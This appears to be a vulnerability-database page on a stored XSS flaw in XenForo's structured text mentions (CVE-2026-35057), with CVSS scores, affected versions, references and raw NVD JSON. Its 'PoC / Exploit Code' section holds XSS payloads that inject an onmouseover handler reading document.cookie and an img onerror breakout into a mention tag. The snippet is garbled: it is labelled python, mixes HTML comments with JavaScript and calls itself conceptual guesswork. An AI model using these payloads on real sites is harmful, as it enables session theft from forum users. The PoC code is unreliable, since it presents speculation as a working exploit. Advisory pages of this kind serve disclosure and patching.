CVE-2026-35057

Description

XenForo before 2.3.10 and before 2.2.19 is vulnerable to stored cross-site scripting (XSS) in structured text mentions, primarily affecting legacy profile post content. An attacker can inject malicious scripts through crafted mentions that are stored and executed when other users view the content.

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:* - VULNERABLE

XenForo < 2.3.10

XenForo < 2.2.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Proof of Concept for CVE-2026-35057 -->
<!-- Target: XenForo < 2.3.10 & < 2.2.19 -->
<!-- Vector: Structured text mention in legacy profile post -->

// Attacker injects a malicious payload through a crafted mention.
// The payload attempts to execute JavaScript when a user views the profile post.

// Example payload structure (Conceptual)
// Depending on the parser, the injection might look like this:
var payload = "[USER=1] onmouseover=alert(document.cookie) [/USER]";

// Alternatively, breaking out of the tag:
var payloadBreakout = "[USER=1]<img src=x onerror=alert('XSS')>[/USER]";

console.log("Payload to inject into profile post: " + payload);

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35057
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35057
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35057/
[4] VulDB https://vuldb.com/cve/CVE-2026-35057
[5] https://github.com/methosiea/xenforo-2-xss
[6] https://xenforo.com/community/threads/xenforo-2-3-10-add-ons-and-2-2-19-released-includes-security-fix.236249/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35057", "sourceIdentifier": "[email protected]", "published": "2026-04-01T01:16:41.790", "lastModified": "2026-04-01T16:24:40.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XenForo before 2.3.10 and before 2.2.19 is vulnerable to stored cross-site scripting (XSS) in structured text mentions, primarily affecting legacy profile post content. An attacker can inject malicious scripts through crafted mentions that are stored and executed when other users view the content."}, {"lang": "es", "value": "XenForo anterior a 2.3.10 y anterior a 2.2.19 es vulnerable a cross-site scripting (XSS) almacenado en menciones de texto estructurado, afectando principalmente el contenido de publicaciones de perfil heredadas. Un atacante puede inyectar scripts maliciosos a través de menciones elaboradas que se almacenan y ejecutan cuando otros usuarios ven el contenido."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.19", "matchCriteriaId": "E01084B6-2B0B-40F7-98AD-DA1014BEDBC4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.3.0", "versionEndExcluding": "2.3.10", "matchCriteriaId": "1675808F-C991-47DA-B05D-46AF05EE77B3"}]}]}], "references": [{"url": "https://github.com/methosiea/xenforo-2-xss", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://xenforo.com/community/threads/xenforo-2-3-10-add-ons-and-2-2-19-released-includes-security-fix.236249/", "source": "[email protected]", "tags": ["Release Notes"]}]}}